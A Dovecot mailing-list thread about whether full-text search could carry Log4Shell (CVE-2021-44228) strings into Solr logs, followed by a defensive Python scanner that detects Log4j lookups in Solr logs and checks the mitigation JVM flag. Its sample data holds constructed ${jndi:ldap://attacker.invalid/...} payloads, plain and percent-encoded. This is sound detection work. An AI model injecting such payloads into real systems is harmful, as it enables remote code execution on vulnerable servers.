Dovecot itself has no log4j vulnerability as Dovecot does not use Java or Log4j directly. Solr, however, does use log4j. Please see https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 for further information on upgrading or mitigating the issue.
Aki

> On 14/12/2021 04:23 Scott <qm...@top-consulting.net> wrote:
>
> Is this assuming you log at some verbose level? What if you log at WARN or higher?
>
> For production it seems kind of silly to log search queries anyways.
>
> Scott
>
> -----Original Message-----
> From: dovecot <dovecot-boun...@dovecot.org> On Behalf Of John Fawcett
> Sent: Monday, December 13, 2021 8:52 PM
> To: dovecot@dovecot.org
> Subject: Re: Can dovecot be leveraged to exploit Solr/Log4shell?
>
> On 13/12/2021 23:43, Joseph Tam wrote:
> >
> > I'm surprised I haven't seen this mentioned yet.
> >
> > An internet red alert went out Friday on a new zero-day exploit. It is an input validation problem where Java's Log4j module can be instructed via a specially crafted string to fetch and execute code from a remote LDAP server. It has been designated the Log4shell exploit (CVE-2021-44228).
> >
> > Although I don't use it, I immediately thought of Solr, which provides some dovecot installations with search indexing. Can dovecot be made to pass on arbitrary loggable strings to affected versions of Solr (7.4.0-7.7.3, 8.0.0-8.11.0)?
> >
> > Those running Solr to implement Dovecot FTS should look at
> >
> > https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
> >
> > Joseph Tam <jtam.h...@gmail.com>
>
> Solr logs the search strings passed, so potentially authenticated users could log malicious strings by searching for them. I do see escaping of some special characters in the log, but not sure if that would be a sufficient mitigation. In my web server logs I see all kinds of patterns that are trying to circumvent WAF rules, so maybe someone will come up with a way of getting the malicious string into the solr log.
>
> As Apache Solr is mentioned as one of the software packages that are impacted, the mitigations are to upgrade to a non-vulnerable version ASAP and in the meantime turn off JNDI lookups.
>
> John
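Two defensive checks that follow from the thread, as an added example that is not part of any message above and not Dovecot or Solr project code: a scanner that flags Log4j lookup syntax (`${...}`, and `${jndi:...}` in particular) in Solr request-log lines, since John's point is that authenticated users' search strings end up in that log, and a check that a Solr JVM option list carries `-Dlog4j2.formatMsgNoLookups=true`, the Log4j 2.10+ system property the linked Solr advisory names as the interim mitigation for 7.4 to 8.11. The log line format and all sample values (hosts under the reserved `.invalid` domain) are constructed for illustration; real Solr log layout varies by version and logging configuration.

```python
"""Defensive checks for the Solr/Log4Shell concern discussed in the thread:
(1) scan Solr request-log lines for Log4j lookup syntax in logged query strings,
(2) check a Solr JVM option list for the lookup-disabling system property.
All sample data below is constructed; none of it comes from the thread.
"""
import re
from urllib.parse import unquote

# Log4j 2 lookup syntax is ${name:...}. Any such token inside a logged,
# user-supplied search string deserves a look; a jndi lookup is the
# CVE-2021-44228 case and is treated as critical.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


def find_lookups(line):
    """Return every ${...} token found in a log line.

    The line is percent-decoded first so that a query logged in encoded
    form (%24%7B...) is not missed by a naive substring search.
    """
    return LOOKUP_RE.findall(unquote(line))


def is_jndi(token):
    """True for a jndi lookup, matched case-insensitively."""
    return "jndi" in token.lower()


def scan_solr_log(lines):
    """Return (line_no, severity, tokens) for each line containing lookups.

    severity is 'critical' when any token is a jndi lookup, otherwise
    'suspicious' (a lookup in a search string is never expected).
    """
    findings = []
    for line_no, line in enumerate(lines, 1):
        tokens = find_lookups(line)
        if not tokens:
            continue
        severity = "critical" if any(is_jndi(t) for t in tokens) else "suspicious"
        findings.append((line_no, severity, tokens))
    return findings


def lookups_disabled(jvm_opts):
    """True if the option list sets -Dlog4j2.formatMsgNoLookups=true.

    This is the Log4j 2.10+ property that the Solr advisory linked in the
    thread describes as the interim mitigation; upgrading is still the fix.
    """
    return any(opt.strip() == "-Dlog4j2.formatMsgNoLookups=true" for opt in jvm_opts)


# Constructed sample log lines (not real Solr output). Line 1 is a normal
# Dovecot FTS query, line 2 carries a plain jndi lookup, line 3 the same
# lookup percent-encoded, line 4 a non-jndi lookup.
SAMPLE_LOG = [
    "2021-12-13 22:43:10.001 INFO (qtp-1) [ x:dovecot] o.a.s.c.S.Request "
    "[dovecot] webapp=/solr path=/select params={q=body:invoice&rows=10} hits=3 status=0 QTime=2",
    "2021-12-13 22:43:11.002 INFO (qtp-1) [ x:dovecot] o.a.s.c.S.Request "
    "[dovecot] webapp=/solr path=/select params={q=subject:${jndi:ldap://attacker.invalid/x}&rows=10} hits=0 status=0 QTime=1",
    "2021-12-13 22:43:12.003 INFO (qtp-1) [ x:dovecot] o.a.s.c.S.Request "
    "[dovecot] webapp=/solr path=/select params={q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.invalid%2Fy%7D&rows=10} hits=0 status=0 QTime=1",
    "2021-12-13 22:43:13.004 INFO (qtp-1) [ x:dovecot] o.a.s.c.S.Request "
    "[dovecot] webapp=/solr path=/select params={q=${env:HOME}&rows=10} hits=0 status=0 QTime=1",
]

# Constructed SOLR_OPTS as they might appear in solr.in.sh, with and without
# the mitigation flag.
SOLR_OPTS_MITIGATED = ["-Xmx2g", "-Dlog4j2.formatMsgNoLookups=true"]
SOLR_OPTS_UNMITIGATED = ["-Xmx2g"]

if __name__ == "__main__":
    for line_no, severity, tokens in scan_solr_log(SAMPLE_LOG):
        print(f"line {line_no}: {severity}: {tokens}")
    print("lookups disabled (mitigated opts):", lookups_disabled(SOLR_OPTS_MITIGATED))
    print("lookups disabled (unmitigated opts):", lookups_disabled(SOLR_OPTS_UNMITIGATED))
```

The scanner deliberately flags every `${...}` token rather than only `jndi`, because a lookup of any kind inside a mailbox search term is not something Dovecot would generate, so the cheap rule has few false positives; the JVM-option check is a configuration audit, not a substitute for upgrading Solr.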